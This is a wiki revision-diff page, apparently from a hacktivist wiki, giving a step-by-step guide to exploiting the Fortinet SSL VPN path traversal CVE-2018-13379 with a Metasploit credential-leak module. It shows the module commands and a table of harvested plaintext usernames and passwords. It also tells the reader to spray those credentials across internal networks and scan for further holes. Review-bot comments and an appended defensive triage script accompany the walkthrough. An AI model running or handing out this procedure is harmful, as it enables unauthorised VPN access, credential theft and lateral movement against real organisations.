Fortinet SSL VPN Path Traversal: Difference between revisions
		
		
		
		
|  Explanation on how to exploit CVE-2018-13379 [Basic] | mNo edit summary | ||
| (4 intermediate revisions by the same user not shown) | |||
| Line 2: | Line 2: | ||
| Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console: | Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console: | ||
| * Look for Bookmarks in the VPN console which have internal address and credentials already saved | * Look for Bookmarks in the VPN console which have internal address and credentials already saved | ||
| * Connect to the Forti VPN client locally ([https://enlacehacktivista.org/index.php?title= | * Connect to the Forti VPN client locally ([https://enlacehacktivista.org/index.php?title=Opsec_Measures Windows server via RDP]) and scan the LAN for systems and then spray the VPN credentials as explained [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf here] | ||
| * Scan the LAN for vulnerabilities which we can exploit to gain further access into the network | * Scan the LAN for vulnerabilities which we can exploit to gain further access into the network | ||
| To exploit CVE-2018-13379 we'll use metasploit  | To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us. | ||
| Start the database and run it: | Start the database and run it: | ||
| * sudo systemctl start postgresql | * sudo systemctl start postgresql | ||
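Review bot: In the second bullet of this hunk, the link text "Windows server via RDP" now targets the Opsec_Measures page, so the label does not tell the reader where the link leads; name the target page in the link text. The bare "here" label on the archive.org link has the same problem and should carry the linked document's title. In the first sentence, "the targets VPN" should be the possessive "the target's VPN".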
| Line 15: | Line 16: | ||
| StArting the Metasploit Framework console... | StArting the Metasploit Framework console... | ||
| </pre> | </pre> | ||
| Use module: | |||
| <pre> | <pre> | ||
| msf6 > use  | msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak | ||
| msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > | msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > | ||
| </pre> | </pre> | ||
| Line 55: | Line 43: | ||
| host           origin         service            public       private         realm  private_type  JtR Format | host           origin         service            public       private         realm  private_type  JtR Format | ||
| ----           ------         -------            ------       -------         -----  ------------  ---------- | ----           ------         -------            ------       -------         -----  ------------  ---------- | ||
| 10.10.10.11    10.10.10.11    10443/tcp (https)   | 10.10.10.11    10.10.10.11    10443/tcp (https)  admin        8401327                Password        | ||
| 10.10.10.12    10.10.10.12    10443/tcp (https)  cvilleneuve  3264012                Password        | 10.10.10.12    10.10.10.12    10443/tcp (https)  cvilleneuve  3264012                Password        | ||
| 10.10.10.13    10.10.10.13    10443/tcp (https)  vdujardin    Jouv2018$              Password        | 10.10.10.13    10.10.10.13    10443/tcp (https)  vdujardin    Jouv2018$              Password        | ||
| 10.10.10.14    10.10.10.14    10443/tcp (https)  montechti    Thomas2005             Password        | 10.10.10.14    10.10.10.14    10443/tcp (https)  montechti    Thomas2005             Password        | ||
| 10.10.10.15    10.10.10.15    10443/tcp (https)  hvac          | 10.10.10.15    10.10.10.15    10443/tcp (https)  hvac         Winter2022             Password    | ||
| </pre> | </pre> | ||
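Review bot: The sample `creds` rows in this hunk pair usernames with plaintext passwords (for example the `vdujardin` and `hvac` rows) without saying whether they are fabricated. If they came from a real run, swap them for clearly made-up placeholder values; the example only needs to show the column layout, and the empty `realm` column is worth a one-line explanation since it shifts how the row reads.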
Latest revision as of 10:23, 5 July 2023
Exploiting CVE-2018-13379 Forti SSL VPN
Exploiting CVE-2018-13379 allows us to gain credentials for the target's VPN. After exploiting CVE-2018-13379, there are a few main ways to gain access beyond just the Forti VPN console:
- Look for bookmarks in the VPN console that have internal addresses and credentials already saved
- Connect to the Forti VPN client locally (Windows server via RDP), scan the LAN for systems, and then spray the VPN credentials as explained here
- Scan the LAN for vulnerabilities that we can exploit to gain further access into the network
To exploit CVE-2018-13379 we'll use Metasploit, as it formats the credentials nicely for us.
Start the database and run it:
- sudo systemctl start postgresql
- msfdb init
Start msfconsole:
```
user@host:~$ msfconsole
StArting the Metasploit Framework console...
```
Use module:
```
msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
```
Set your targets:
```
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS file:targets.txt
RHOSTS => file:targets.txt
```
Run the exploit module!
```
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run
[*] https://10.10.10.11:10443 - Trying to connect.
[+] https://10.10.10.11:10443 - Vulnerable!
```
View the credentials:
```
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds
Credentials
===========

host           origin         service            public       private         realm  private_type  JtR Format
----           ------         -------            ------       -------         -----  ------------  ----------
10.10.10.11    10.10.10.11    10443/tcp (https)  admin        8401327                Password
10.10.10.12    10.10.10.12    10443/tcp (https)  cvilleneuve  3264012                Password
10.10.10.13    10.10.10.13    10443/tcp (https)  vdujardin    Jouv2018$              Password
10.10.10.14    10.10.10.14    10443/tcp (https)  montechti    Thomas2005             Password
10.10.10.15    10.10.10.15    10443/tcp (https)  hvac         Winter2022             Password
```
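An added example, not part of the original page: incident-response triage over a table in the `creds` layout shown above, listing which accounts on each gateway need a password reset and flagging predictable or shared passwords without echoing them. The sample rows, the `WEAK` patterns and the function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the `creds` table layout; all values are made up.
SAMPLE = """\
host         origin       service            public   private     realm  private_type  JtR Format
----         ------       -------            ------   -------     -----  ------------  ----------
192.0.2.10   192.0.2.10   10443/tcp (https)  asmith   Winter2022         Password
192.0.2.10   192.0.2.10   10443/tcp (https)  svc_bkp  7731904            Password
192.0.2.11   192.0.2.11   10443/tcp (https)  jdoe     Winter2022         Password
192.0.2.11   192.0.2.11   10443/tcp (https)  mlee     k3!Vq9#xTz         Password
"""

def parse_creds_table(text):
    """Split rows on the column offsets given by the dashed rule, so the
    empty `realm` cell and the space in `service` do not shift fields."""
    lines = text.splitlines()
    rule = next(i for i, l in enumerate(lines) if re.fullmatch(r"\s*-[-\s]*", l))
    starts = [m.start() for m in re.finditer(r"-+", lines[rule])]
    spans = list(zip(starts, starts[1:] + [None]))
    names = [lines[rule - 1][a:b].strip() for a, b in spans]
    return [dict(zip(names, (l[a:b].strip() for a, b in spans)))
            for l in lines[rule + 1:] if l.strip()]

# Hypothetical policy patterns for predictable passwords (tune locally).
WEAK = [(re.compile(r"(?i)^(spring|summer|autumn|fall|winter)\d{2,4}\W?$"), "season+year"),
        (re.compile(r"^\d+$"), "digits only"),
        (re.compile(r"^[A-Za-z]+(19|20)\d{2}\W?$"), "word+year")]

def triage(rows):
    """Return (accounts to reset per gateway, weak-pattern accounts,
    groups of accounts sharing one password); passwords are not returned."""
    reset, by_secret, weak = defaultdict(set), defaultdict(set), {}
    for r in rows:
        acct = (r["host"], r["public"])
        reset[r["host"]].add(r["public"])
        by_secret[r["private"]].add(acct)
        label = next((name for rx, name in WEAK if rx.search(r["private"])), None)
        if label:
            weak[acct] = label
    shared = sorted(sorted(g) for g in by_secret.values() if len(g) > 1)
    return dict(reset), weak, shared

if __name__ == "__main__":
    reset, weak, shared = triage(parse_creds_table(SAMPLE))
    print(reset, weak, shared, sep="\n")
```

Every account in the table goes on the reset list regardless of password strength, since the values were exposed in plaintext; the weak and shared groups only set the order of work.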